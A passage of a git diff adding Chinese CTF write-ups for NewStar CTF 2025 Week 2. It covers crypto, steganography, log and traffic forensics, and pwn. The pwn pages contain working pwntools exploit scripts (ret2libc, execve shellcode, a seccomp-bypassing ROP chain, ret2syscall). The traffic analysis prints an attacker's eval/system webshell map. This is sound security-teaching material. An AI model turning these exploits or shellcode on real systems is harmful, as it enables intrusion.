+所有关系都完美对应,所以 $C_3 \cong Z_3$。群论研究的正是这种抽象的结构,而不是元素的具体形式。 + +让我们看一个不是循环群的阿贝尔群。考虑一个长方形(非正方形)的对称性: + +1. $e$:恒等操作(不动) +2. $h$:沿水平中线翻转 +3. $v$:沿垂直中线翻转 +4. $r$:绕中心旋转 $180^\circ$ + +这四个操作构成一个群,我们称之为 Klein 4元群,记作 $V_4$。 + +它的乘法表如下: + +| $\cdot$ | $e$ | $h$ | $v$ | $r$ | +| :-----: | :-: | :-: | :-: | :-: | +| **$e$** | $e$ | $h$ | $v$ | $r$ | +| **$h$** | $h$ | $e$ | $r$ | $v$ | +| **$v$** | $v$ | $r$ | $e$ | $h$ | +| **$r$** | $r$ | $v$ | $h$ | $e$ | + +这个表是沿对角线对称的,所以 $V_4$ 是阿贝尔群。但你找不到任何一个元素(除了 $e$)能通过自身运算生成整个群,所以它不是循环群。 + +在对称群 $S_n$ 中,有些置换可以表示为偶数个“对换”(比如只交换两个位置的置换,如 $(12)$)的复合,有些则可以表示为奇数个对换的复合。 + +- 偶置换:如 $(123) = (13)(12)$,是两个对换的复合。 +- 奇置换:如 $(12)$,自身就是一个对换。 + +所有偶置换的集合本身也构成一个群,它是 $S_n$ 的一个子群,称为**交错群**,记作 $A_n$。 +对于 $S_3$,偶置换有 $\{e, (123), (132)\}$。这正是我们熟悉的 $C_3$ 的结构!所以,$A_3 \cong C_3$。 + +我们可以用已知的群来构造新的群,最简单的方法就是**直积**。 + +假设我们有两个群 $G$ 和 $H$,它们的直积 $G \times H$ 是一个新群,其元素是 $(g, h)$ 这样的有序对,其中 $g \in G, h \in H$。运算定义为按分量进行: + +$$ (g_1, h_1) \cdot (g_2, h_2) = (g_1 \cdot g_2, h_1 \cdot h_2) $$ + +让我们用最简单的非平凡群 $C_2 = \{0, 1\}$(模 $2$ 加法)来构造直积 $C_2 \times C_2$。 + +它的元素是:$\{(0,0), (0,1), (1,0), (1,1)\}$。 + +它的运算表是: + +| $+_2$ | $(0,0)$ | $(0,1)$ | $(1,0)$ | $(1,1)$ | +| :---------: | :-----: | :-----: | :-----: | :-----: | +| **$(0,0)$** | $(0,0)$ | $(0,1)$ | $(1,0)$ | $(1,1)$ | +| **$(0,1)$** | $(0,1)$ | $(0,0)$ | $(1,1)$ | $(1,0)$ | +| **$(1,0)$** | $(1,0)$ | $(1,1)$ | $(0,0)$ | $(0,1)$ | +| **$(1,1)$** | $(1,1)$ | $(1,0)$ | $(0,1)$ | $(0,0)$ | + +这个结构是不是很眼熟?如果我们做一个映射: + +$$ (0,0) \mapsto e ; (1,0) \mapsto h ;(0,1) \mapsto v ; (1,1) \mapsto r $$ + +你会发现这个表和 Klein 4元群 $V_4$ 的乘法表完全一样!因此,我们得到了一个重要的结论: + +$$ V_4 \cong C_2 \times C_2 $$ + +这展示了不同概念之间的深刻联系:一个描述几何对称的群($V_4$),其结构等价于两个最简单的代数群($C_2$)的直积。 + +还有其他很多很多的群,比如 $D_4, Q_8$,就留给你自己去探索啦。 diff --git a/docs/wp/2025/week2/crypto/permutation.md b/docs/wp/2025/week2/crypto/permutation.md new file mode 100644 index 0000000..2410c8b --- /dev/null +++ b/docs/wp/2025/week2/crypto/permutation.md @@ -0,0 +1,20 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 置换 + + + +本题考查古典密码中的置换密码。 + + +[置换的概念](https://oi-wiki.org/math/permutation/) + +一句话说就是套皮古典密码。 + +只要手动计算一下两个置换的复合,然后把密文逆回去就好了。 diff --git a/docs/wp/2025/week2/crypto/rsa-revenge.md b/docs/wp/2025/week2/crypto/rsa-revenge.md new file mode 100644 index 0000000..3fab866 --- /dev/null +++ b/docs/wp/2025/week2/crypto/rsa-revenge.md @@ -0,0 +1,14 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# RSA_revenge + + + +本题考查费马小定理、欧拉定理和爆破。 + diff --git a/docs/wp/2025/week2/index.md b/docs/wp/2025/week2/index.md new file mode 100644 index 0000000..1a3a45c --- /dev/null +++ b/docs/wp/2025/week2/index.md @@ -0,0 +1,9 @@ +--- +title: WriteUp +titleTemplate: ":title - NewStar CTF 2025" +comments: false +--- + +# WriteUp - NewStar CTF 2025 + +这里是 NewStar CTF 2025 Week 2 的官方 WriteUp 页面。 diff --git a/docs/wp/2025/week2/misc/beautiful-music.md b/docs/wp/2025/week2/misc/beautiful-music.md new file mode 100644 index 0000000..c2405fb --- /dev/null +++ b/docs/wp/2025/week2/misc/beautiful-music.md @@ -0,0 +1,20 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 美妙的音乐 + + + +本题考查 midi 音频隐写的分析。 + + +midi 音频隐写,听声音没听出来什么异常,那么有可能是不发声的音符隐写,用 [miditrail](https://www.yknk.org/miditrail/en/download/)(也可以是其他工具,只要能查看 midi 的音符就行)打开,可以观察到: + +![miditrail 界面](/assets/images/wp/2025/week2/beautiful-music_1.png) + +于是最后的 flag 就是 `flag{thi5_1S_m1Di_5tEG0}`。 diff --git a/docs/wp/2025/week2/misc/log-intrusion.md b/docs/wp/2025/week2/misc/log-intrusion.md new file mode 100644 index 0000000..87e2792 --- /dev/null +++ b/docs/wp/2025/week2/misc/log-intrusion.md @@ -0,0 +1,24 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 日志分析:不敬者的闯入 + + + +本题考查日志分析和漏洞排查的基本能力。 + + +题目中附件给了一个 `access.log`。在线环境打开是一个网站。 + +我们分析 `access.log`,筛选 `状态码 200` 的日志 + +在日志里可以看到 ip 为 `171.16.20.72` 访问了 `/admin/Webshell.php` 的记录,同时 `/admin/` 也是允许被访问的 + +![日志分析](/assets/images/wp/2025/week2/log-intrusion_1.png) + +我们访问 `/admin/` 可以发现有目录浏览漏洞,而在里面只有 `Webshell.php`,访问后可以发现连接密码即为 flag. diff --git a/docs/wp/2025/week2/misc/newkeyboard.md b/docs/wp/2025/week2/misc/newkeyboard.md new file mode 100644 index 0000000..eb73ced --- /dev/null +++ b/docs/wp/2025/week2/misc/newkeyboard.md @@ -0,0 +1,14 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# Misc 城邦:NewKeyboard + + + +本题考查 USB 流量及映射脚本编写。 + diff --git a/docs/wp/2025/week2/misc/osint-threat-intel.md b/docs/wp/2025/week2/misc/osint-threat-intel.md new file mode 100644 index 0000000..88adcb5 --- /dev/null +++ b/docs/wp/2025/week2/misc/osint-threat-intel.md @@ -0,0 +1,68 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# OSINT:威胁情报 + + + +本题考查开源情报收集与分析能力。 + + +题目给了一个恶意情报的 hash 值,我们可以借助公开的威胁情报中心来完成此题。 + +这里我使用的是[奇安信威胁情报中心](https://ti.qianxin.com/)和 [VirusTotal](https://www.virustotal.com/gui/home/search)。 + +题目需要我们找到关于恶意文件的`apt 组织名称`、`通信 C2 服务器域名`、`恶意文件编译时间(年-月-日)` + +## APT 组织名称 + +奇安信威胁情报中心中,在首页我们就可以直接得到攻击组织的名称 + +![攻击组织名称](/assets/images/wp/2025/week2/osint-threat-intel_1.png) + +VirusTotal: + +在 Family labels 中显示多个标签,我们可以在社区进行进一步的确定。 + +![攻击组织名称](/assets/images/wp/2025/week2/osint-threat-intel_2.png) + +在社区中,通过其他检测人员的确认确定 apt 家族名称。 + +![apt 家族名称](/assets/images/wp/2025/week2/osint-threat-intel_3.png) + +## 通信 C2 服务器域名 + +奇安信威胁情报中心: + +我们需要点击`样本分析详情`得到动态运行的详细内容。 + +![样本分析详情](/assets/images/wp/2025/week2/osint-threat-intel_4.png) + +在`网络行为`栏,我们可以得到域名 + +![获得域名](/assets/images/wp/2025/week2/osint-threat-intel_5.png) + +VirusTotal: + +在 `BEHAVIOR` - `Activity Summary` - `Memory Patten Domains` 中可以确定它的域名。 + +![VirusTotal](/assets/images/wp/2025/week2/osint-threat-intel_6.png) + +## 恶意文件编译时间(年 - 月 - 日) + +奇安信威胁情报中心: + +在`基本信息` - `Exiftool 文件元数据` - `TimeStamp` 代表恶意文件的编译时间 + +![编译时间](/assets/images/wp/2025/week2/osint-threat-intel_7.png) + +VirusTotal: + +在`DETAILS` - `History` - `Create Time` 可以得知编译时间 + +![编译时间](/assets/images/wp/2025/week2/osint-threat-intel_8.png) diff --git a/docs/wp/2025/week2/misc/thursday.md b/docs/wp/2025/week2/misc/thursday.md new file mode 100644 index 0000000..59f9904 --- /dev/null +++ b/docs/wp/2025/week2/misc/thursday.md @@ -0,0 +1,139 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 星期四的狂想 + + + +本题考查 HTTP 流量分析及简单的编码解码能力。 + + +我们使用 [wireshark](https://www.wireshark.org/#download) 工具可以分析 pcag 文件。 + +打开之后会看到密密麻麻的通讯协议流量,我们可以点击“文件” → “导出对象” → “HTTP” 来分析所有使用 HTTP 通讯的流量。 + +![alt text](/assets/images/wp/2025/week2/thursday_1.png) + +通过分析 `upload.php` 的所有流量,我们能获取到这样几个信息: + +1. 攻击者上传了一个 `chickenvivo50.php` 文件,用于提供函数; +2. 攻击者上传了一个 `crazy.php` 文件,用于读取与混淆 flag; +3. 然后从 `uploads/index.php` 处触发攻击。 + +`chickenvivo50.php`: + +```php + function($code) { eval($code); }, + "thursday" => "exec", + 'chicken' => 'system', + 'vivo' => 'header', + 'vv50' => 'passthru', + "crazy" => function($file) { require_once($file); } +]; + +$getFunction = function($name) use ($func_map) { + return isset($func_map[$name]) ? $func_map[$name] : null; +}; +?> +``` + +`crazy.php`: + +```php + +``` + +`index.php`: + +```php + +``` + +很明显,如果我们设定 `cmd=ThURSDAY` 就会执行 `code($hahahahahaha)`,然后从 `Cookie` 处返回回来一个 `token` 参量。 + +这里的 `$hahahahahaha` 是 flag 通过编码后的形式。通过逆向 `crazy.php` 中的内容,我们可以知道,flag 被读取之后会被 base64 编码,然后被切成十个十个一组,通过随机的方式进行 rot13 或者 reverse 编码。 + +理解了加密逻辑之后,我们就可以编写一个解密脚本,由于块并不是很多,所以我们可以直接暴力枚举每一个块的可能性,如果在块比较多的情况下,我们可以考虑逐块尝试。 + +下面是我们的加密数据。 + +![alt text](/assets/images/wp/2025/week2/thursday_2.png) + +`decoder.py`: + +```python +# decoder.py + +import base64, codecs + +enc = "R2FYdDNaaHhtWlMwS21TR0szRVZxSUF4QVV5c0hLVzlWZXN0MllwVmdDOUJUTlBaVlM9PQ==" + +dec = base64.b64decode(enc.encode()).decode() +print(f"第一层解码:{dec}") + +Split = lambda s, n: [s[i:i+n] for i in range(0, len(s), n)] + +parts = Split(dec, 10) +final_dec = "" + + +for i in parts: + part_dec1 = codecs.encode(i, 'rot_13') + part_dec2 = i[::-1] + try: + now_enc = final_dec + part_dec1 + missing_padding = len(now_enc) % 4 + if missing_padding: + now_enc += '=' * (4 - missing_padding) + print(f"[*] 尝试解码方法:ROT13") + res = base64.b64decode(now_enc.encode()).decode() + print(f"[+] 成功解码:{res}") + final_dec += part_dec1 + except Exception as e: + now_enc = final_dec + part_dec2 + missing_padding = len(now_enc) % 4 + if missing_padding: + now_enc += '=' * (4 - missing_padding) + print(f"[*] 尝试解码方法:反转") + res = base64.b64decode(now_enc.encode()).decode() + print(f"[+] 成功解码:{res}") + final_dec += part_dec2 + +print(f"最终解码结果:{base64.b64decode(final_dec.encode()).decode()}") +``` + +最终 flag 为 `flag{What_1S_tHuSd4y_Quickly_VIVO50}`。 diff --git a/docs/wp/2025/week2/pwn/calc-beta.md b/docs/wp/2025/week2/pwn/calc-beta.md new file mode 100644 index 0000000..b11c472 --- /dev/null +++ b/docs/wp/2025/week2/pwn/calc-beta.md @@ -0,0 +1,152 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# calc_beta + + + +本题考查简单的 ret2csu 和 ret2libc 利用。 + + +本题打法很多,除了新生要学但又不太常用的 `ret2csu`,还有很多打法。 + +比如说,`beta_puts()` 可以当作 `puts` 来使用,这样就可以直接泄露 libc 地址,转化成简单的 `ret2libc`。 + +或者说,用残留的 `rdx`,结合 `pop rdi; ret` 和 `pop rsi; ret` 以及 `write`,同样可以泄露 libc 地址,并转化成 `ret2libc`。 + +```asm + 401230: 4c 89 fa mov rdx, r15 + 401233: 4c 89 f6 mov rsi, r14 + 401236: 44 89 ef mov edi, r13d + 401239: 41 ff 14 dc call [r12 + rbx*8] + 40123d: 48 83 c3 01 add rbx, 1 + 401241: 48 39 dd cmp rbp, rbx + 401244: 75 ea jne 401230 <__libc_csu_init+0x40> + 401246: 48 83 c4 08 add rsp, 8 + 40124a: 5b pop rbx + 40124b: 5d pop rbp + 40124c: 41 5c pop r12 + 40124e: 41 5d pop r13 + 401250: 41 5e pop r14 + 401252: 41 5f pop r15 + 401254: c3 ret +``` + +如上,我们可以用 `pop` 控制 `rbx rbp r12 r13 r14 r15` 六个寄存器,然后再在上面的分支里面,间接控制 `rdx`,`rsi`,`edi` 寄存器,也可以控制执行流 `call [r12+rbx*8]`。 + +那么用 `ret2csu` 调用 `write` 泄露 libc 地址然后打 `ret2libc` 即可。 + +```python +from pwn import * +filename = './calc' +libc = ELF("./libc.so.6") +#host= '8.147.132.32' +host = '127.0.0.1' +#port= 14294 +port = 1337 + +sla = lambda x,s : p.sendlineafter(x,s) +sl = lambda s : p.sendline(s) +sa = lambda x,s : p.sendafter(x,s) +s = lambda s : p.send(s) + +e = ELF(filename) +context.log_level='debug' +context(arch=e.arch, bits=e.bits, endian=e.endian, os=e.os) + +def run(mode, script = ""): + if "d" in mode: + p = gdb.debug(filename, script) + elif "l" in mode: + p = process(filename) + elif "r" in mode: + p = remote(host, port) + elif "a" in mode: + p = process(filename) + gdb.attach(p, script) + return p + +def getp(): + global script + if len(sys.argv) == 2: + p = run(sys.argv[1], script) + else: + p = run("l", script) + return p + +script = ''' +b execve +go +''' + +def menu(choice): + sla('>', str(choice)) + +def show(): + menu(1) + nums = [] + for i in range(0, 16): + p.recvuntil(' = ') + nums.append(int(p.recvline(keepends=False), 10)) + return nums + +def add(idx1, idx2, idx3): + menu(4) + menu(1) + sla('>',str(idx1)) + sla('>',str(idx2)) + sla('>',str(idx3)) + menu(6) + +def edit(idx, content): + menu(2) + sla('>',str(idx)) + sla('> ',str(content)) + +def pwn(): + global p + p = getp() + pop6 = 0x40124A + payload = flat(pop6, 0, 0, e.plt['write'], 1, e.got['write'], 0x100) + payload += p64(e.sym['main']) + + edit(1, 0) + edit(2, 1) + edit(3, e.got['write']) + edit(4, 1) + edit(5, e.got['write']) + edit(6, 0x100) + edit(7, 0x401230) + edit(8, 0x401254) + edit(15, e.sym['main']) + + edit(0, pop6) + + libcbase = u64(p.recv(8)) - libc.sym['write'] + eaddr = libcbase + libc.sym['execve'] + rdx = libcbase + 0x0000000000130516 + rsi = libcbase + 0x0000000000023a6a + rdi = libcbase + 0x000000000002164f + binsh = libcbase + libc.search("/bin/sh").__next__() + saddr = libcbase + libc.sym['system'] + + # pause() + edit(1, binsh) + edit(2, rsi) + edit(3, 0) + edit(4, rdx) + edit(5, 0) + edit(6, rdi+1) + edit(7, saddr) + + pause() + edit(0, rdi) + +pwn() +p.interactive() +``` diff --git a/docs/wp/2025/week2/pwn/input-small-function.md b/docs/wp/2025/week2/pwn/input-small-function.md new file mode 100644 index 0000000..f04189d --- /dev/null +++ b/docs/wp/2025/week2/pwn/input-small-function.md @@ -0,0 +1,154 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# input_small_function + + + +本题考查 shellcode 的进阶利用。 + + +这道题目是 input_function 的延续,我们把可执行文件用 IDA 打开,查看 `main` 函数: + +![IDA 查看 main 函数](/assets/images/wp/2025/week2/input-small-function_1.png) + +这一道题目仍然考查 shellcode,但是对读入字符数做出了限制,同时存在一个 `clear` 函数,我们查看一下 `clear` 函数的内容。 + +![IDA 查看 clear 函数](/assets/images/wp/2025/week2/input-small-function_2.png) + +看上去就只是返回了 0,但是我们看汇编代码。 + +![clear 函数汇编清空寄存器](/assets/images/wp/2025/week2/input-small-function_3.png) + +可以看到程序清空了 `rax`,`rbx`,`rcx`,`rdx`,`rdi`,`rsi`,`r8`-`r15`寄存器,因此此时程序中仅有 `rbp`,`rsp`,`rip` 三个寄存器没有被清空。 + +![返回 main 后设置 shellcode 地址](/assets/images/wp/2025/week2/input-small-function_4.png) + +随后程序返回 `main` 函数之后,将 shellcode 开始的地址放入 `rdx` 中,随后执行 `call rdx` 以执行 shellcode。 + +![call rdx 执行 shellcode](/assets/images/wp/2025/week2/input-small-function_5.png) + +由于存在 shellcode 字符数限制,因此直接使用 pwntools 生成的 shellcode 会由于长度过长而导致失败,一般情况下我们有以下的两条思路。 + +## 思路一:shellcode 优化 + +我们先考虑对 shellcode 进行优化。 + +首先我们写出最简单的 shellcode: + +```asm +mov rax, 59 +mov rdi, 0x68732f6e69622f +push rdi +mov rdi, rsp +xor rsi, rsi +xor rdx, rdx +syscall +``` + +这个 shellcode 是最简单最直观的,但是汇编出来是 29 字节,长度过长,我们以这个为基础进行优化。 + +在 gdb 中我们可以看到,程序在进入 shellcode 之前清空了除了 `rsi` 等寄存器,因此即使我不使用 `xor rsi, rsi`,`rsi` 寄存器也是 0,因此可以直接删去这一行。 + +同时,由于 `rax` 也被清零,所以将 `rax` 赋值为 59,下面几行汇编指令均可以达到目的: + +```asm +mov rax,59 +mov eax,59 +mov ax,59 +mov al,59 + +add rax,59 +add eax,59 +add ax,59 +add al,59 +``` + +汇编之后的机器码如下,可以看到字符数最少的语句是 `mov al, 0x3b`,仅为 2 字节。 + +```asm +Disassembly: +0: 48 c7 c0 3b 00 00 00 mov rax,0x3b +7: b8 3b 00 00 00 mov eax,0x3b +c: 66 b8 3b 00 mov ax,0x3b +10: b0 3b mov al,0x3b +12: 48 83 c0 3b add rax,0x3b +16: 83 c0 3b add eax,0x3b +19: 66 83 c0 3b add ax,0x3b +1d: 04 3b add al,0x3b +``` + +随后,我们需要知道,`push 寄存器`和 `pop 寄存器`的字符数均为 1,因此 `mov rdi, rsp`(3 字节)可写为 `push rsp ; pop rdi`(2 字节),这样还能节省 1 字节。 + +`xor rdx, rdx` 为 3 字节,但是 `xor edx, edx` 仅为 2 字节也可以达到清空寄存器的目的。 + +优化完的 shellcode 如下: + +```asm +mov al, 59 +mov rdi, 0x68732f6e69622f +push rdi +push rsp +pop rdi +xor edx, edx +syscall +``` + +> [!info] +> 将 `xor edx, edx` 写成 `cdq` 还可以再节省 1 字节的空间 + +最终的脚本如下: + +```python +from pwn import * +context(os="linux", arch="amd64", log_level="debug") + +io = remote("8.147.132.32", 25912) +# io = process("src/pwn") +io.recvuntil(b"please input a small function") +shell = """ +mov al, 59 +mov rdi, 0x68732f6e69622f +push rdi +push rsp +pop rdi +xor edx, edx +syscall +""" +shell = asm(shell) +io.send(shell) + +io.interactive() +``` + +## 思路二:构建 `read` 再次读入 + +其实还有种思路,既然执行 shellcode 的时候,shellcode 所处段还是可读可写可执行的状态,并且 `rdx` 中还存储着此段的地址,那么可以考虑通过 shellcode 构建一个 `read`,通过这个 `read` 再次读入 shellcode,即可绕过 `main` 函数中 `read` 对于字节大小的限制。 + +相当于是要分两次写入两段 shellcode,第一段 shellcode 调用 `read` 函数以读入第二段 shellcode,通过第二段 shellcode 拿到 shell + +```python +from pwn import * +context(os="linux", arch="amd64", log_level="debug") + +io = remote("39.106.48.123", 36987) +# io = process("src/pwn") +io.recvuntil(b"please input a small function") +shell1 = """ +mov rsi, rdx +syscall +""" +shell1 = asm(shell1) +shell2 = b"\x90"*5 + asm(shellcraft.sh()) + +io.send(shell1) +pause() +io.send(shell2) + +io.interactive() +``` diff --git a/docs/wp/2025/week2/pwn/no-shell.md b/docs/wp/2025/week2/pwn/no-shell.md new file mode 100644 index 0000000..55314a6 --- /dev/null +++ b/docs/wp/2025/week2/pwn/no-shell.md @@ -0,0 +1,177 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# no shell + + + +本题考查沙箱与 ROP. + + +参考链接 + +- [Linux沙箱之seccomp介绍 | arch3rn4r](https://arch3rn4r.github.io/2024/09/21/Linux%E6%B2%99%E7%AE%B1%E4%B9%8Bseccomp%E4%BB%8B%E7%BB%8D/) +- [ROP入门 - Hello CTF](https://hello-ctf.com/hc-pwn/ROP/) + +在对一个 pwn 附件进行逆向分析前,挑战者不得不去获取一些其他的信息。 + +需要的工具有:checksec 和 seccomp-tools,前者在安装 pwntools 的时候就会附带,后者则需要独立安装,在 Ubuntu 环境下,安装可参考: + +```sh +sudo apt install gcc ruby-dev +sudo gem install seccomp-tools +``` + +## 预处理 + +在安装好工具后,就来到了预处理环节,也就是获取“其他信息“。 + +![信息收集](/assets/images/wp/2025/week2/no-shell_1.png) + +`check` 下可以看到程序的一些基础信息: + +- amd64 架构、64 位、小端序(little) +- No canary,没有 canary 保护 +- No PIE,没有 PIE 保护 + +其他的属性可以不关心。 + +至于 seccomp-tools,得知程序不允许使用 `execve` 系统调用(是的,就是 ret2syscall 中那个系统调用),`system` 因此无法使用。 + +## 逆向分析 + +![逆向分析](/assets/images/wp/2025/week2/no-shell_2.png) + +`init` 然后是一大堆输出。 + +有 3 个输入点,第一个是在第 11 行的 `getchar`,第二个是 13 行的 `read`,第三个是 21 行的 `scanf`,但是都没办法溢出 + +在 `init` 中,初始化了流,进行了 `sandbox`,初始了 `off` 变量为 16。 + +![初始化](/assets/images/wp/2025/week2/no-shell_3.png) + +经过了前面的一系列操作后,来到了本题的重点,`challenge` 函数 + +### challenge + +![功能点](/assets/images/wp/2025/week2/no-shell_4.png) + +有 5 个功能。 + +#### 1. Check your power + +输出 `off`,输入一些东西。 + +![check your power](/assets/images/wp/2025/week2/no-shell_5.png) + +#### 2. Get the power of your cat + +设置 `off` 为 256。 + +![Get the power of your cat](/assets/images/wp/2025/week2/no-shell_6.png) + +#### 3. Open the door + +打开 `flag.txt`,然后关闭。 + +![Open the door](/assets/images/wp/2025/week2/no-shell_7.png) + +#### 4. Destroy this world + +删除 flag 或者 `system("/bin/sh")`。 + +![Destroy this world](/assets/images/wp/2025/week2/no-shell_8.png) + +当然,由于沙箱机制,这俩个操作都不会成功,反而会让程序崩溃。 + +#### 5. leave this world + +退出程序。 + +## 漏洞分析 + +在以上梳理后,漏洞相当明显,先设置 `off` 为 256,再输入,就能溢出返回地址。 + +至于 ROP 构造,由于不能构造 `system("/bin/sh")`,所以得使用 [orw](https://www.cnblogs.com/falling-dusk/p/18101528)。 + +`open` 有俩参数,要控制 `rdi` 和 `rsi` 寄存器。 + +`read` 和 `write` 有三个参数,要控制 `rdi`,`rsi`,`rdx` 寄存器。 + +```python +fd = open('flag',0) # 注意,是 flag 不是 flag.txt +read(fd,buf,0x40) +write(1,buf,0x40) +``` + +![ROPgadget](/assets/images/wp/2025/week2/no-shell_9.png) + +`pop rdi`,`pop rsi`,`pop rdx`,还有一个非常关键的 `mov rdi, rax` 用于传递返回值,形似于这样的 rop 链。 + +![rop 链](/assets/images/wp/2025/week2/no-shell_10.png) + +在下面的 EXP 中,`rax` 指代 `mov rdi, rax ; ret` 所在的地址 + +`rdi`,`rsi`,`rdx` 指代 `pop rdi/rsi/rdx ; ret` 所在的地址 + +## EXP + +```python +from pwn import * + +context.binary = elf = ELF('./noshell') +context.log_level = 'debug' +context.terminal = ['tmux', 'splitw', '-h'] + +io = process(elf.path) +# gdb.attach(io, gdbscript='b *0x401460') + +io.recvuntil(b'Do you want to say something?\n') +io.sendline(b'yes') + +io.recvuntil(b'leave or capture the flag?\n') +io.sendline(b'2') + +io.recvuntil(b'your choice: ') +io.sendline(b'2') + +io.recvuntil(b'your choice: ') +io.sendline(b'1') + + +rdi = 0x4013f3 +rsi = 0x4013f5 +rdx = 0x4013f7 +rax = 0x4013f9 + +open_addr = 0x4011E0 +read_addr = 0x4011B4 +write_addr = 0x401144 + +payload = flat( + b'A' * 0x28, + rdi, + 0x40206B-1, + rsi, + 0, + open_addr, + rax, + rsi, + 0x404300, + rdx, + 0x50, + read_addr, + rdi, + 0x404300, + write_addr, +) + +io.sendline(payload) + +io.interactive() +``` diff --git a/docs/wp/2025/week2/pwn/stack-secret.md b/docs/wp/2025/week2/pwn/stack-secret.md new file mode 100644 index 0000000..f68318d --- /dev/null +++ b/docs/wp/2025/week2/pwn/stack-secret.md @@ -0,0 +1,37 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 刻在栈里的秘密 + + + +本题考查格式化字符串漏洞利用及 x86-64 函数调用约定的理解。 + + +这题没有附件,只有远程靶机,连接之后你会看到一些这样的输出 + +![题面](/assets/images/wp/2025/week2/stack-secret_1.png) + +需要我们去泄露存放在栈上的密码以及它对应的地址。本题的目标是“泄露”,所以我们重点关注两个指示符: + +- `$`: 位置指示符,允许我们指定要访问第几个参数,例如 `%7$p` 就是以指针形式打印第 7 个参数。 +- `%p` (或 `%lx`): 以十六进制形式打印一个指针或长整型。 +- `%s`: 将对应参数视为一个 `char*` 指针,并打印出它所指向的字符串内容。 + +要准确定位泄露目标,我们必须了解 x86-64 架构下函数是如何传递参数的。 + +- 前 6 个参数: 通过寄存器传递。依次是 `RDI`, `RSI`, `RDX`, `RCX`, `R8`, `R9`。 +- 第 7 个及以后的参数: 通过栈传递。`printf` 的第 7 个参数就位于 `RSP`(栈顶)所指向的位置,第 8 个在 `RSP+8`,以此类推。 + +这也是出题人想通过题目描述想表达的事情。在 `printf(your_input)` 调用中,我们的输入(格式化字符串)位于 `RDI`,但是由于 `printf` 的错误使用,没有给出第二个参数,`printf` 会遵循调用约定,当它需要第一个格式化参数时,它会去 `RSI` 里找;需要第二个时,去 `RDX` 里找,以此类推。 + +所以只要**计算出指向密码的指针**所在位置所对应的参数位置,就可以用 `%n$s` 进行泄露,这里用 $n$ 个 `%s` 是不行的,栈上难免会有一些不合法的地址,使用 `%s` 会导致程序直接崩溃。 + +稍微数一数就知道我们需要的 $n$ 是 24,所以使用 `%24$s` 来泄露密码,用 `%24$p` 来泄露指针即可。 + +![验证逻辑](/assets/images/wp/2025/week2/stack-secret_2.png) diff --git a/docs/wp/2025/week2/pwn/syscall.md b/docs/wp/2025/week2/pwn/syscall.md new file mode 100644 index 0000000..ad2ccef --- /dev/null +++ b/docs/wp/2025/week2/pwn/syscall.md @@ -0,0 +1,134 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# syscall + + + +本题考查需要写入 `/bin/sh` 的 ret2syscall 利用。 + + +## 分析 + +程序是静态链接,32 位的。 + +漏洞点在 `read` 的溢出,并且没有 `canary` 的保护,偏移是 `0x16` + +```c +int func() +{ + _BYTE v1[14]; // [esp+6h] [ebp-12h] BYREF + + return read(0, v1, 100); +} +``` + +在 IDA 中,按 ⇧ shift F12 查看字符串,发现没有 `/bin/sh` 字符串,程序也没有找到后门函数,因此考虑利用 ret2syscall。 + +## ret2syscall 介绍 + +### 系统调用 + +函数系统调用,指运行在**用户空间**的程序向**操作系统内核**请求需要更高权限运行的服务。系统调用提供用户程序与操作系统之间的接口。大多数系统交互式操作需求在内核态执行。如设备 IO 操作或者进程间通信。 + +Linux 的系统调用通过 `int 80h`(32 位) 或 `syscall`(64位)实现,用系统调用号来区分入口函数。 + +**应用程序调用系统调用的过程是:** + +1. 把系统调用的编号存入 `EAX`; +2. 把函数参数存入其它通用寄存器; +3. 触发 `0x80` 号中断(`int 0x80`)或 `call syscall`。 + +#### 系统调用号 + +可查询[系统调用表](https://blog.csdn.net/winter2121/article/details/119845443)来获取系统调用号,如 32 位程序 `execve()` 的系统调用号位 `0xb`. + +#### 参数传递 + +| 系统 | 顺序 | +| ---- | ------------------------------------------- | +| 32位 | `eax` → `edx` → `ecx` → `ebx` | +| 64位 | `rdi` → `rsi` → `rdx` → `rcx` → `r8` → `r9` | + +### 具体实现 + +#### 32位 + +一般通过调用 `execve("/bin/sh", NULL, NULL)` 来 getshell + +```asm +eax: 系统调用号(如0xb) +ebx: "/bin/sh" +ecx: 0 +edx: 0 +``` + +##### ROPgadgets工具 + +```bash +ROPgadget --binary syscall --only 'pop|ret' | grep 'eax' +ROPgadget --binary syscall --only 'pop|ret' | grep 'ebx' +ROPgadget --binary syscall --only 'pop|ret' | grep 'ecx' +ROPgadget --binary syscall --only 'pop|ret' | grep 'edx' +ROPgadget --binary syscall --string '/bin/sh' +ROPgadget --binary rop --opcode cd80c3 +ROPgadget --binary rop --only 'int' +``` + +## 做题 + +由于程序没有 `binsh` 字符串,应该先构造一个 `read` 将 `/bin/sh` 写入 `.bss` 段中。 + +先利用 ROPgadget 查找控制寄存器的值,32 位系统调用号存在 `eax` 中 + +```python +pop_eax_ret = 0x080b438a +pop_ebx_ret = 0x08049022 +pop_ecx_ret = 0x0804985a +pop_edx_ret = 0x0804985c +``` + +读取 `/bin/sh` 后就可以构造 `execve("/bin/sh",0,0)` 完成利用了; + +还有一点要注意的就是,查找 `int 80` 时,使用 `ROPgadget --binary rop --only 'int'` 查找的 `int 80` 后面没有 `ret` 导致 ROP 链进行不下去,可以用 `ROPgadget --binary rop --opcode cd80c3` 查找。 + +exp: + +```python +from pwn import * +context(arch = 'i386',os = 'linux',log_level = 'debug') +elf = ELF('./pwn') +io = remote('8.147.134.121',20659) +#io=process('./pwn') + +offset = 22 + +pop_eax = 0x080b438a +pop_ebx = 0x08049022 +pop_ecx = 0x0804985a +pop_edx = 0x0804985c +int_0x80 = 0x08073a00 +bss_addr = elf.bss() + +payload = cyclic(offset) +payload += p32(pop_eax)+p32(0x3) +payload += 